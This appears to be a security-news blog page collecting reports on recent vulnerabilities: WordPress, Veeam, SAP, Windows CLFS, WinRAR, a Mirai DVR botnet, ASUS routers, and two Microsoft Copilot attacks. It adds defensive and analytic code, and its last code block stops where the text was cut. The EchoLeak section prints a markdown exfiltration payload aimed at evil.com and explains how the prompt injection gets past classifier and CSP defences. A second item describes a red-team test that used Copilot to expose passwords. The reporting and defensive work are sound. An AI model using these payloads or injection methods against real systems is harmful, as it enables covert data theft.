Showing posts with label Vulnerabilities and Exploits.

Thousands of WordPress Sites at Risk as Motors Theme Flaw Enables Admin Account Takeovers


A critical security flaw tracked as CVE-2025-4322 has left a widely used premium WordPress theme exposed to attackers.

Cybercriminals have been exploiting this vulnerability in the Motors theme to seize administrator accounts, allowing them to fully compromise websites—modifying information, inserting fake content, and distributing malicious payloads.

Developed by StylemixThemes, Motors has become especially popular with automotive websites, recording nearly 22,500 purchases on EnvatoMarket. Security researchers first identified the flaw on May 2, 2025, and a fix was issued with version 5.6.68 on May 14. Users who have updated to this version are protected, while those still running versions up to 5.6.67 remain vulnerable.

“This is due to the theme not properly validating a user’s identity prior to updating their password,” Wordfence explained.

“This makes it possible for unauthenticated attackers to change arbitrary user passwords, including those of administrators, and leverage that to gain access to their account.”

Despite the release of the patch, attacks began surfacing as early as May 20. By June 7, researchers observed widespread exploitation, with Wordfence reporting it had already blocked over 23,000 attack attempts. The firm also shared lists of IP addresses involved in the attacks, many launching thousands of intrusion efforts.

“One obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability,” the researchers explained.

To secure their sites, users of the Motors theme are strongly advised to upgrade to version 5.6.68 immediately, which addresses the flaw and prevents further account takeovers.

Researchers Advise Caution as Veeam Releases Patch to Fix Critical Vulnerability


Following Tuesday's Veeam Backup & Replication release that patches a critical remote code execution vulnerability, researchers are advising customers to make sure their systems are fully upgraded to the latest version.

The vulnerability, tracked as CVE-2025-23121, lets an authorised domain user execute code on a backup server. Researchers at watchTowr and Code White GmbH had previously shown that the fix for an earlier vulnerability, CVE-2025-23120, could be bypassed; the new patch was prepared in response to that disclosure.

Benjamin Harris, CEO of watchTowr, claims that Veeam is essentially updating a blacklist of "dangerous deserialisation gadgets" once they have been identified. Harris said that throughout the deployment of multiple patches for the Backup & Replication product, researchers have observed this occur repeatedly.

"This blacklisting approach will never be sufficient, as we advocated in March," Harris wrote in an email to Cybersecurity Dive, further stating that his team "demonstrated [this] once again in March when we reported further gadgets to Veeam that they have released patches for [on Tuesday] to address.” 

Veeam stated that the patch fixes the issue, and automatic updates have been enabled for all backup versions.

“When a vulnerability is identified and disclosed, attackers will still try to exploit and reverse-engineer the patches to use the vulnerability on an unpatched version of Veeam software in their exploitation attempts,” a Veeam spokesperson told Cybersecurity Dive via email. “This underlines the importance of ensuring customers are using the latest versions of all software and patches are installed in a timely manner.”

Veeam Backup & Replication is a product for backing up, replicating and restoring enterprise data, including after a ransomware attack or other intrusion. Domain-joined backup servers, a deployment Veeam has previously recommended against, are the ones at risk; the risky configuration nonetheless appears to be common because it is convenient.

Harris noted that Veeam handles data with a function that is known to be intrinsically insecure and that, rather than removing that function, Veeam tries to maintain a list of bad "gadgets" that the function must not process.

Veeam has around 550,000 customers, and ransomware gangs often exploit the product's flaws. Rapid7 researchers revealed on Tuesday that more than 20% of the firm's incident response cases in 2024 involved Veeam being accessed or abused.

Veeam Issues Urgent Security Patch to Fix Critical RCE Flaw in Backup & Replication Software

Veeam has rolled out crucial security patches addressing multiple vulnerabilities in its Backup & Replication (VBR) software—most notably, a critical remote code execution (RCE) flaw tracked as CVE-2025-23121.

This specific vulnerability, discovered by researchers at watchTowr and CodeWhite, impacts only those VBR installations that are joined to a domain. According to Veeam’s security advisory released on Tuesday, the flaw allows authenticated domain users to execute code remotely on the backup server through relatively simple attack methods. The issue affects Veeam Backup & Replication version 12 and later and has been resolved in version 12.3.2.3617, which was made available earlier today.

Despite the restriction to domain-linked systems, the vulnerability can be exploited by any domain user—posing a serious risk in environments where this configuration exists.

Many organizations still connect their backup servers to Windows domains, contrary to Veeam's best practices. The company advises using a separate Active Directory Forest and enforcing two-factor authentication for administrative accounts.

This is not the first time Veeam has faced such issues. In March, the company addressed another RCE vulnerability (CVE-2025-23120), which also affected domain-connected installations.

Ransomware operators have long focused on VBR servers due to their strategic value. These systems often serve as the gateway to deleting backups and crippling restoration efforts, as BleepingComputer was told by threat actors in prior years.

Recent incidents further highlight the ongoing risk. Sophos X-Ops disclosed in November that CVE-2024-40711, revealed in September, is actively being used to deploy Frag ransomware. This flaw was also weaponized in Akira and Fog ransomware campaigns starting October.

Historically, groups like the Cuba ransomware gang and FIN7—a financially motivated threat group with ties to Conti, REvil, Maze, and BlackBasta—have exploited similar VBR vulnerabilities.

Veeam's software is widely used across industries, serving over 550,000 customers globally, including 82% of Fortune 500 and 74% of Global 2000 companies.

Aim Security Reveals Zero-Click Flaw in AI Powered Microsoft Copilot

A newly reported threat known as EchoLeak has been described as the first documented zero-click vulnerability targeting Microsoft 365 Copilot in the enterprise. It raises important concerns about the evolving risks of AI-based enterprise tools.

In a recent report, cybersecurity firm AIM Security disclosed a vulnerability that allows threat actors to stealthily exfiltrate sensitive information from Microsoft's intelligent assistant without any user interaction, a significant escalation in the sophistication of attacks on artificial intelligence systems.

The vulnerability, tracked as CVE-2025-32711 with a critical CVSS score of 9.3, is a serious form of command injection into the AI system. An unauthorised actor can manipulate Copilot's responses and force data disclosure over a network through indirect prompt injection, even when the user has not engaged with or clicked on any prompt.

Microsoft confirmed the issue and shipped the fix as part of the June 2025 Patch Tuesday update, which addressed 68 vulnerabilities in total. EchoLeak is an instance of what is described as a "scope violation" in large language models (LLMs): the contextual boundaries meant to limit the AI's behaviour are bypassed, so the AI can display unintended behaviour and leak confidential information.

Although no active exploitation of the flaw has been detected, Microsoft has stated that customers need take no action, since the issue has already been resolved. The incident makes it increasingly apparent that the challenge of securing AI-powered productivity tools is growing and that organisations must put more robust measures in place to protect data from theft and exploitation.

EchoLeak is believed to exploit a critical design flaw in how Microsoft 365 Copilot mixes trusted internal data sources, including emails, Teams conversations and OneDrive files, with untrusted external input, in particular inbound emails, which can be crafted maliciously.

To carry out the attack, the threat actor sends an email that contains the following markdown syntax:

![Image alt text][ref]
[ref]: https://www.evil.com?param=

The markup looks harmless, but it abuses Copilot's background scanning behaviour: when Copilot processes the email without any user action, the image reference causes a browser request that transmits information to an external server controlled by the attacker, including user details, chat history and confidential internal documents.

Because this kind of exfiltration requires no user input, it is particularly stealthy and dangerous. The exploit relies on a chain of three underlying weaknesses, the most critical being a redirect loophole in Microsoft's Content Security Policy (CSP). Because the CSP inherently trusts domains such as Microsoft Teams and SharePoint, attackers can disguise malicious payloads as legitimate traffic and evade detection.

Disguised in this way, the exploit bypasses the existing defences against Cross-Prompt Injection Attacks (XPIA), attacks that hijack AI prompts across contexts. EchoLeak is considered an example of an LLM Scope Violation, in which a large language model is tricked into accessing and exposing information outside its authorised scope.

The researchers report being able to use different segments of the AI's context window as references to pull out information the AI should not reveal. Copilot's ability to synthesise responses from a variety of sources is precisely the feature that becomes a vector for data exfiltration.

According to Michael Garg, Co-Founder and CTO of Aim Security, a phased deployment of artificial intelligence does not guarantee safety. In his opinion, EchoLeak highlights a serious concern with the assumptions surrounding artificial intelligence security, particularly in systems that combine trusted and untrusted sources without establishing strict boundaries. 

Interestingly, researchers have also found similar vulnerabilities in other LLM-based systems, suggesting that the issue may go beyond Microsoft 365 Copilot as well. It is now understood that the flaw has been fixed by Microsoft and that no malicious exploitation has been reported in the wild, and no customer information has been compromised as a result. 

However, the discovery of EchoLeak is a reminder of the unique risks AI-powered platforms pose and of the need for proactive security validation in AI deployments. EchoLeak's attack chain is deceptively simple, yet it exploits the seamless integration between large language models (LLMs) and enterprise productivity tools to its fullest extent. The attack begins with a malicious email designed to look like routine business communication.

It contains no obvious indicators that would raise suspicion. The message appears benign but has been crafted as a stealthy prompt injection, a piece of text intended to manipulate the AI without being detected. What makes the injection so dangerous is its natural language phrasing, which lets it slip past Microsoft's Cross-Prompt Injection Attack (XPIA) classifier protections.

The message is constructed to appear contextually relevant to the end user, so existing filters do not flag it. Later, whenever the user interacts with Copilot and poses a related business query, Microsoft's Retrieval-Augmented Generation (RAG) engine retrieves the previously received email as relevant to the request and places it in the LLM's context input.

Once included in the prompt context, the malicious injection covertly instructs the LLM to extract internal data, such as confidential memos or user-specific identifiers, and embed these sensitive details in a URL or image reference. During testing, certain markdown image formats caused the browser to fetch the image without prompting the user, sending the entire URL, including the embedded sensitive data, to the attacker's server without the user being aware of it.

A key component enabling the exploit is Microsoft Copilot's Content Security Policy (CSP), which blocks most external domains but trusts Microsoft-owned platforms such as Teams and SharePoint. By routing their exfiltration through these trusted domains, attackers make the outbound request appear legitimate and evade the CSP protections.

While Microsoft has since patched the vulnerability, the EchoLeak incident points to a broader and more alarming trend: as LLMs become more deeply integrated into business environments, traditional security frameworks are increasingly unable to detect and defend against contextual and zero-click artificial intelligence attacks. The growing complexity and autonomy of AI systems has already created a whole new class of vulnerabilities that can be concealed and weaponised for stealthy, high-impact intrusions.

Security experts increasingly emphasise the need for stronger prompt injection defences against such emerging threats, including stricter input scoping, postprocessing filters that block AI-generated outputs containing structured data or external links, and smarter RAG engine configurations that prevent the retrieval of untrusted data. Implementing these mitigations in AI-powered workflows is essential to prevent future data leakage via LLMs and to build resilience into these workflows.
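An added example, not code from the Aim Security report or from Microsoft, of the postprocessing filter mentioned above: it scans an LLM's output for markdown image and link targets, including the reference-style form shown in the EchoLeak email, that point at hosts outside an allowlist, and strips them before the output is rendered. The allowlist, the host names and the sample output are constructed for illustration.

```python
"""Post-processing filter for Copilot-style LLM output.

Finds markdown image/link targets (inline, reference-definition and bare URL forms)
whose host is not on an allowlist and replaces them with a marker, so a renderer
cannot issue the image fetch that carries context data to an attacker's server.
Hypothetical example code; ALLOWED_HOSTS and SAMPLE_OUTPUT are constructed.
"""
import re
from urllib.parse import urlparse

# Assumption: an organisation would replace these with the origins it actually trusts.
# Note this complements, and does not replace, a tightened CSP: a trusted host that
# redirects elsewhere is still a problem this text filter cannot see.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

# ![alt](target) and [text](target)
INLINE_RE = re.compile(r"!?\[[^\]]*\]\(\s*(<[^>]*>|[^\s)]+)")
# Reference definition line, the form used in the EchoLeak email:  [ref]: target
REFDEF_RE = re.compile(r"^\s*\[[^\]]+\]:\s*(<[^>]*>|\S+)", re.MULTILINE)
# Bare URLs, which many renderers auto-link
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)


def host_of(url: str) -> str:
    """Lower-cased host part of a URL ('' if it cannot be parsed)."""
    try:
        return (urlparse(url.strip("<>")).hostname or "").lower()
    except ValueError:
        return ""


def external_urls(text: str) -> list[str]:
    """URLs in the output whose host is not allowlisted, in order of first appearance."""
    candidates = [m.group(1) for m in INLINE_RE.finditer(text)]
    candidates += [m.group(1) for m in REFDEF_RE.finditer(text)]
    candidates += URL_RE.findall(text)
    result, seen = [], set()
    for raw in candidates:
        url = raw.strip("<>")
        host = host_of(url)
        if host and host not in ALLOWED_HOSTS and url not in seen:
            seen.add(url)
            result.append(url)
    return result


def carries_query(url: str) -> bool:
    """True when the URL has a query string: the exfiltration pattern described in the
    text appends extracted data to a parameter on the attacker's host."""
    return urlparse(url.strip("<>")).query != ""


def sanitize_output(text: str) -> tuple[str, list[str]]:
    """Replace every non-allowlisted URL with a marker.
    Returns (clean_text, blocked_urls) so the blocked URLs can be logged for review."""
    blocked = external_urls(text)
    clean = text
    for url in blocked:
        clean = clean.replace(url, "[blocked-url]")
    return clean, blocked


# Constructed sample of an LLM answer into which an injected email has smuggled a
# reference-style image whose URL carries extracted data.
SAMPLE_OUTPUT = (
    "Here is the Q3 summary you asked for.\n"
    "![Image alt text][ref]\n"
    "[ref]: https://www.evil.com?param=MEMO-Q3-merger-plan-confidential\n"
    "Source: https://contoso.sharepoint.com/sites/finance/Q3.docx\n"
)

if __name__ == "__main__":
    clean, blocked = sanitize_output(SAMPLE_OUTPUT)
    for url in blocked:
        print(f"blocked {url} (query string present: {carries_query(url)})")
    print(clean)
```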

Research from AIM Security shows that the EchoLeak exploit is severe because it abuses Microsoft trusted domains such as SharePoint and Teams that Copilot's Content Security Policy (CSP) approves. Through these allowlisted domains, images and hyperlinks can be embedded in Microsoft 365 Copilot so that external content, such as images, is rendered seamlessly within the application.

When Copilot processes such content, even in the background, it can initiate outbound HTTP requests that send sensitive contextual data to attacker-owned servers without the user being aware of it. What makes the attack so insidious is that it requires no interaction from the user at all and is extremely difficult to detect. The entire exploit chain runs silently in the background, triggered by Copilot's automated scanning and processing of incoming email content, which can include maliciously formatted documents.

The user does not need to open the message or click any links; the AI assistant's own internal mechanisms launch the data exfiltration, which earns the exploit its "zero-click" classification. Aim Security validated the exploit by developing and publishing a proof-of-concept demonstrating how deeply embedded confidential information, such as internal communications and corporate strategy documents, could be extracted without any visible sign or warning to the end user or to system administrators.

The stealthy nature of the vulnerability makes threat detection and forensic investigation significantly harder. Microsoft has addressed the vulnerability and taken swift measures to resolve it, noting that no active exploitation has been observed so far and no customer data has been compromised.

Although the broader implications of the current situation remain unsettling, the very architecture that enables AI systems such as Copilot to synthesise data, engage with users, and provide assistance will also become a potential attack surface - one that is both silent and highly effective in its capabilities. Despite the fact that this particular instance may not have been exploited in the wild, cybersecurity professionals warn that the method itself signals a paradigm shift in the vulnerability landscape when it comes to AI-related services. 

With the increasing use of artificial intelligence services such as Microsoft 365 Copilot, the threat landscape has expanded considerably, but it also highlights the importance of context-aware security models as well as AI-specific threat monitoring frameworks in light of the increasing integration of large language models into enterprise workflows.

Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw


A Mirai botnet malware variant is targeting a command injection flaw in internet-connected digital video recorders used for CCTV monitoring, which allows the attackers to take over the devices and add them to a botnet.

Researchers at Russian cybersecurity firm Kaspersky discovered an exploit for CVE-2024-3721 while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability in internet-connected digital video recorders used for CCTV surveillance. Further analysis revealed that the activity was tied to a variant of the Mirai botnet, which exploits this issue in TBK-manufactured DVR devices to compromise and control them.

The vulnerability was initially discovered by security researcher "netsecfish" in April 2024. The researcher released a proof-of-concept showing how a crafted POST request to a specific URL, adjusting parameters such as mdb and mdc, can trigger shell command execution. Kaspersky confirmed that this precise technique is being used in the wild, with its Linux honeypots catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs.

Nearly a decade ago, an anonymous source made the Mirai source code available online. It continues to act as the foundation for other evolving botnet efforts. The variant aimed at DVR systems expands on Mirai's initial foundation with extra features such as RC4-based string obfuscation, checks to avoid virtual machine environments, and anti-emulation methods. 

The exploit is used by the attackers to transmit a malicious ARM32 program to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, forward malicious traffic, and engage in other malicious actions.

This Mirai variant uses a basic RC4 routine to decode its internal strings, with the decryption key disguised using XOR. After decryption, the strings are saved in a global list and used throughout runtime. To evade analysis, the malware runs anti-virtualization and anti-emulation checks, inspecting active processes for indicators of environments such as VMware or QEMU.
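As an added illustration of the string-obfuscation scheme just described (not Kaspersky's code and not taken from the sample), the following Python reproduces the decoder an analyst would write: the RC4 key is stored XOR-masked in the binary, and at start-up every encrypted string is RC4-decrypted into a global list. The mask byte, the key and the sample strings are constructed.

```python
"""Decoder for an RC4 string table whose key is stored XOR-masked.

Hypothetical example code; XOR_MASK, the key and PLAINTEXTS are constructed and are
not values from the real sample. The table is built with the same routine so the
block runs offline; in practice the blobs and masked key are carved from the binary.
"""

XOR_MASK = 0x5A  # assumption: a constructed single-byte mask


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream). Encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unmask_key(masked_key: bytes, mask: int = XOR_MASK) -> bytes:
    """Recover the real RC4 key from the XOR-masked copy stored in the binary."""
    return bytes(b ^ mask for b in masked_key)


def decode_string_table(masked_key: bytes, table: list[bytes]) -> list[str]:
    """What the malware does once at start-up: unmask the key, decrypt every blob,
    and keep the results in a global list for use at runtime."""
    key = unmask_key(masked_key)
    return [rc4(key, blob).decode("utf-8", errors="replace") for blob in table]


# Constructed sample mimicking what an analyst would carve out of the binary: the
# environment indicators the text says the sample checks for, plus a placeholder C2 host.
PLAINTEXTS = ["vmware", "qemu", "/proc/self/status", "c2.placeholder.invalid"]
_REAL_KEY = b"constructed-key"
MASKED_KEY = bytes(b ^ XOR_MASK for b in _REAL_KEY)
ENCRYPTED_TABLE = [rc4(_REAL_KEY, s.encode()) for s in PLAINTEXTS]

# The global string list, as the malware would populate it
DECODED_STRINGS: list[str] = decode_string_table(MASKED_KEY, ENCRYPTED_TABLE)

if __name__ == "__main__":
    for blob, text in zip(ENCRYPTED_TABLE, DECODED_STRINGS):
        print(f"{blob.hex():<48} -> {text}")
```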

Last year, netsecfish reported that around 114,000 DVR devices were vulnerable to CVE-2024-3721; Kaspersky estimates the figure to be closer to 50,000. The majority of infections associated with this Mirai variant are found in Brazil, Russia, Egypt, China, India, and Ukraine.

Thousands of ASUS Routers Affected by Stealthy Persistent Backdoor


It seems like someone, possibly nation-state hackers, is building a botnet out of thousands of Asus routers that can withstand firmware patches and reboots. Researchers report that about 9,000 routers have been infiltrated, and the figure is still rising. 

GreyNoise, a security firm, warned on Tuesday that attackers are using a combination of known and previously undisclosed vulnerabilities to attack the routers, including a command injection vulnerability identified as CVE-2023-39780. The tradecraft involved implies "a well-resourced and highly capable adversary," possibly building an operational relay box (ORB) network.

ORBs are a strategy used by advanced persistent threat groups, including intelligence agencies around the world, to conceal malicious behaviour by routing internet traffic through a network of compromised Internet of Things devices. One cybersecurity firm characterises them as the offspring of a VPN and a botnet.

GreyNoise discovered the campaign on March 18 and named the technique used to backdoor the routers "AyySSHush." The intrusion chain starts with brute-force login attempts and two authentication bypass methods that have no corresponding CVEs. After gaining access, the attackers use CVE-2023-39780 to activate a security feature built into Asus routers by TrendMicro.

That functionality enables "Bandwidth SQLlite Logging," which lets the attackers feed a string directly into a system() call. With that capability, they can enable a secure shell, bind it to a TCP port and add an attacker-controlled public key. This is the step that renders firmware updates ineffective against the compromise.

"Because this key was introduced using official ASUS features, the configuration change is retained across firmware upgrades. If you've been exploited before, upgrading your firmware will NOT remove the SSH backdoor," Remacle warned. As of publication, a Censys search had identified 8,645 infected routers.

ASUS addressed CVE-2023-39780 in recent firmware upgrades. However, devices compromised before patching may still contain the backdoor unless administrators verify their SSH configuration and remove the attacker's key. For suspected compromises, GreyNoise recommends performing a full factory reset.

Ransomware Hackers Target SAP Servers Through Critical Flaw

A newly discovered security hole in SAP’s NetWeaver platform is now being misused by cybercriminals, including ransomware gangs. This flaw allows attackers to run harmful commands on vulnerable systems from a distance—without even needing to log in.

SAP issued urgent software updates on April 24 after learning about the flaw, found in NetWeaver’s Visual Composer tool. The weakness, labeled CVE-2025-31324, makes it possible for attackers to upload files containing malware. Once inside, they can take full control of the affected system.

ReliaQuest, a cybersecurity firm that tracked this issue, now says that two known ransomware groups, RansomEXX and BianLian, have joined in. Although they have not yet successfully launched any ransomware in these cases, their involvement shows that multiple criminal groups are watching this flaw closely.

Investigators linked BianLian to at least one incident using an IP address tied to their past operations. In another case, RansomEXX attackers used a backdoor tool called PipeMagic and also took advantage of a previously known bug in Microsoft’s Windows system (CVE-2025-29824).

Even though their first effort didn’t succeed, the attackers made another attempt using a powerful hacking framework called Brute Ratel. They delivered it using a built-in Microsoft function called MSBuild, which helped them run the attack in a sneaky way.

More recently, security teams from Forescout and EclecticIQ connected this activity to hackers linked to China. These groups, tracked under various names, were also found to be exploiting the same SAP vulnerability. In fact, they managed to secretly install backdoors on at least 581 SAP systems, including some tied to national infrastructure in the US, UK, and Saudi Arabia. Their plans may also include targeting nearly 2,000 more systems soon.

Experts believe these hidden access points could help foreign state-sponsored hackers gather intelligence, interfere with operations, or even achieve military or economic goals. Since SAP systems are often connected to important internal networks, the damage could spread quickly within affected organizations.

SAP has also fixed another weakness (CVE-2025-42999), which had been silently misused since March. To stay safe, system administrators are advised to apply the patches immediately. If they can’t update right away, disabling the Visual Composer tool can help. They should also restrict access to certain features and monitor their systems closely for anything unusual.

The US government’s cyber agency CISA has officially listed this flaw as a known risk. Federal departments were told to patch their systems by May 20 to avoid falling victim.

Pen Test Partners Uncovers Major Vulnerability in Microsoft Copilot AI for SharePoint


Pen Test Partners, a renowned cybersecurity and penetration testing firm, recently exposed a critical vulnerability in Microsoft's Copilot AI for SharePoint. Known for simulating real-world hacking scenarios, the company's red team specialists investigate how systems can be breached just as skilled threat actors would attempt in real time. With attackers increasingly leveraging AI, ethical hackers are now adopting similar methods, and the outcomes are raising eyebrows.

In a recent test, the Pen Test Partners team explored how Microsoft Copilot AI integrated into SharePoint could be manipulated. They encountered a significant issue when a seemingly secure encrypted spreadsheet was exposed—simply by instructing Copilot to retrieve it. Despite SharePoint’s robust access controls preventing file access through conventional means, the AI assistant was able to bypass those protections.

“The agent then successfully printed the contents,” said Jack Barradell-Johns, a red team security consultant at Pen Test Partners, “including the passwords allowing us to access the encrypted spreadsheet.”

This alarming outcome underlines the dual nature of AI in information security: it can enhance defenses, but it can also inadvertently open doors to attackers if not properly governed.

Barradell-Johns further detailed the engagement, explaining how the red team encountered a file labeled passwords.txt, placed near the encrypted spreadsheet. When traditional methods failed due to browser-based restrictions, the hackers used their red team expertise and simply asked the Copilot AI agent to fetch it.

“Notably,” Barradell-Johns added, “in this case, all methods of opening the file in the browser had been restricted.”

Still, those download limitations were sidestepped. The AI agent output the full contents, including sensitive credentials, and allowed the team to easily copy the chat thread, revealing a potential weak point in AI-assisted collaboration tools.

This case serves as a powerful reminder: as AI tools become more embedded in enterprise workflows, their security testing must evolve in step. It's not just about protecting the front door; it's about teaching your digital assistant not to hold it open for strangers.

For those interested in the full technical breakdown, the complete Pen Test Partners report covers the step-by-step methods used and the broader security implications of Copilot's current design.

Davey Winder reached out to Microsoft, and a spokesperson said:

“SharePoint information protection principles ensure that content is secured at the storage level through user-specific permissions and that access is audited. This means that if a user does not have permission to access specific content, they will not be able to view it through Copilot or any other agent. Additionally, any access to content through Copilot or an agent is logged and monitored for compliance and security.”

Davey Winder then contacted Ken Munro, founder of Pen Test Partners, who issued the following statement addressing the points in Microsoft's response.

“Microsoft are technically correct about user permissions, but that’s not what we are exploiting here. They are also correct about logging, but again it comes down to configuration. In many cases, organisations aren’t typically logging the activities that we’re taking advantage of here. Having more granular user permissions would mitigate this, but in many organisations data on SharePoint isn’t as well managed as it could be. That’s exactly what we’re exploiting. These agents are enabled per user, based on licenses, and organisations we have spoken to do not always understand the implications of adding those licenses to their users.”

Windows CLFS Zero-Day Flaw Exploited in Play Ransomware Attacks


In zero-day attacks, the Play ransomware gang exploited a critical Windows Common Log File System flaw to gain SYSTEM privileges and install malware on compromised PCs. The vulnerability, tracked as CVE-2025-29824, was identified by Microsoft as exploited in a small number of attacks and was addressed in last month's patch release.

"The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia," Microsoft noted in April. 

Microsoft attributed these assaults to the RansomEXX ransomware outfit, claiming that the perpetrators installed the PipeMagic backdoor malware, which was employed to deliver the CVE-2025-29824 exploit, ransomware payloads, and ransom letters after encrypting files. 

Since then, Symantec's Threat Hunter Team has discovered evidence linking them to the Play ransomware-as-a-service operation, claiming that the hackers used a CVE-2025-29824 zero-day privilege escalation exploit after breaching a US organization's network. 

"Although no ransomware payload was deployed in the intrusion, the attackers deployed the Grixba infostealer, which is a custom tool associated with Balloonfly, the attackers behind the Play ransomware operation," Symantec added. "Balloonfly is a cybercrime group that has been active since at least June 2022 and uses the Play ransomware (also known as PlayCrypt) in attacks.” 

The Grixba custom network-scanning and information-stealing program was discovered two years ago, and Play ransomware operators often use it to list users and computers in compromised networks. The Play cybercrime gang first appeared in June 2022, and it is also renowned for double-extortion attacks, in which its affiliates coerce victims into paying ransoms to prevent their stolen data from being exposed online. 

As of October 2023, the Play ransomware gang has compromised the networks of around 300 organisations globally, according to a joint alert released by the FBI, CISA, and the Australian Cyber Security Centre (ACSC) in December 2023. 

The cloud computing company Rackspace, the massive auto retailer Arnold Clark, the City of Oakland in California, Dallas County, the Belgian city of Antwerp, and, more recently, the American semiconductor supplier Microchip Technology and doughnut chain Krispy Kreme are among the notable victims of the Play ransomware.

Microsoft: CLFS Zero-Day Flaw Exploited in Ransomware Attacks


Ransomware attackers abused a zero-day flaw in a widely used Windows logging system for managing transactional information to launch attacks against organisations in the US real estate sector, Microsoft revealed Tuesday. 

In a blog post, the tech giant stated that the perpetrators employed a previously unknown flaw discovered in Windows' Common Log File System - a popular target for malicious actors seeking privilege escalation - to attack "a small number of targets," including American real estate firms, a Spanish software company, Venezuela's financial sector, and Saudi Arabia's retail sector. 

The flaw, identified as CVE-2025-29824, has a CVSS score of 7.8 and has been added to the Cybersecurity and Infrastructure Security Agency's "Known Exploited Vulnerabilities Catalogue". 

Microsoft stated that Storm-2460, a ransomware threat actor, used the issue to spread PipeMagic malware. In March, the firm addressed a different bug in the Windows Win32 Kernel Subsystem that allowed attackers to escalate privileges to the system level, an exploit that researchers later linked to targeted attacks against Asian and Saudi organisations using a PipeMagic backdoor.

The tech behemoth said it "highly recommends organizations apply all available security updates for elevation of privilege flaws to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold.”

Microsoft noted that it has not yet determined how Storm-2460 gained access to compromised devices, although it did note that the group used the Windows certutil utility to download malware from a legitimate third-party website it had previously compromised.

Following the deployment of PipeMagic, the attackers used a technique that avoided writing data to disk and let them launch the log system exploit directly in memory. In a security update posted on Tuesday, the company stated that users of Windows 11, version 24H2, "are not affected by the observed exploitation, even if the vulnerability was present."

WinRAR Bug Circumvents Windows Mark of the Web Security Notifications


A security flaw in the WinRAR file archiver solution might be used to circumvent the Mark of the Web (MotW) security warning and execute arbitrary code on a Windows computer. The vulnerability is known as CVE-2025-31334 and impacts all WinRAR versions except the most recent release, 7.11. 

Mark of the Web is a security mechanism in Windows that uses a metadata value (an alternate data stream named 'Zone.Identifier') to flag potentially dangerous files downloaded from the internet. When you launch an executable carrying the MotW tag, Windows warns you that it was obtained from the internet and may be risky, and you can choose whether to continue or abort.

Symlink to executable

The CVE-2025-31334 flaw allows an attacker to circumvent the MotW security warning when opening a symbolic link (symlink) to an executable file in any WinRAR version prior to 7.11. Using a specially designed symbolic link, an attacker can execute arbitrary code. It should be noted that on Windows, symlinks can only be generated with administrator privileges. 

The security flaw received a medium severity score of 6.8 and was fixed in the latest version of WinRAR, according to the application's change log: "If symlink pointing at an executable was started from WinRAR shell, the executable Mark of the Web data was ignored" - WinRAR.

Shimamine Taihei of Mitsui Bussan Secure Directions reported the vulnerability to the Information Technology Promotion Agency (IPA) in Japan. The responsible disclosure was organised by Japan's Computer Security Incident Response Team with the developer of WinRAR.

Starting with version 7.10, WinRAR allows you to remove information from the MotW alternate data stream (such as location and IP address) that could be deemed a privacy issue. Cybercriminals, including state-sponsored ones, have previously used MotW bypasses to deliver malware without triggering the security warning.

Recently, Russian attackers exploited a vulnerability in the 7-Zip archiver that did not propagate the MotW when double archiving (archiving one file within another) to launch the Smokeloader malware dropper.
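As an added example (not code from WinRAR, 7-Zip or Microsoft), the Python below parses the Zone.Identifier stream that carries the mark, trims it the way WinRAR 7.10's privacy option does while keeping the zone, and resolves a symlink to its target before reading the mark, which is the check the pre-7.11 WinRAR shell skipped. The stream text is constructed sample data; reading a live stream only works on an NTFS volume.

```python
"""Mark of the Web (Zone.Identifier) helpers.

Added example, not code from WinRAR or Microsoft. SAMPLE_STREAM is a
constructed stream; real ones are written by browsers and archivers when a
file arrives from the Internet zone.
"""
import os
from dataclasses import dataclass
from typing import Optional

# URLZONE values as Windows defines them; 3 (Internet) and 4 (Restricted)
# are the zones that make Windows show the "downloaded from the internet" prompt.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed sample of a Zone.Identifier stream (CRLF line endings, as on disk).
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://downloads.example.invalid/\r\n"
                 "HostUrl=https://downloads.example.invalid/tool.exe\r\n")


@dataclass
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str] = None
    host_url: Optional[str] = None

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"Unknown zone {self.zone_id}")

    def warns_on_launch(self) -> bool:
        """Windows shows the MotW prompt for the Internet and Restricted zones."""
        return self.zone_id >= 3


def parse_zone_identifier(text: str) -> Optional[MarkOfTheWeb]:
    """Parse the INI-style [ZoneTransfer] section; None if there is no usable ZoneId."""
    section = None
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "zonetransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()
    zone = fields.get("zoneid", "")
    if not zone.isdigit():
        return None
    return MarkOfTheWeb(int(zone), fields.get("referrerurl"), fields.get("hosturl"))


def strip_origin_fields(text: str) -> str:
    """Rewrite the stream keeping only ZoneId and dropping ReferrerUrl/HostUrl.

    This is the privacy trimming WinRAR 7.10 offers: the zone, and with it the
    security prompt, is preserved while the download origin is removed.
    """
    motw = parse_zone_identifier(text)
    if motw is None:
        return ""
    return f"[ZoneTransfer]\r\nZoneId={motw.zone_id}\r\n"


def read_motw(path: str) -> Optional[MarkOfTheWeb]:
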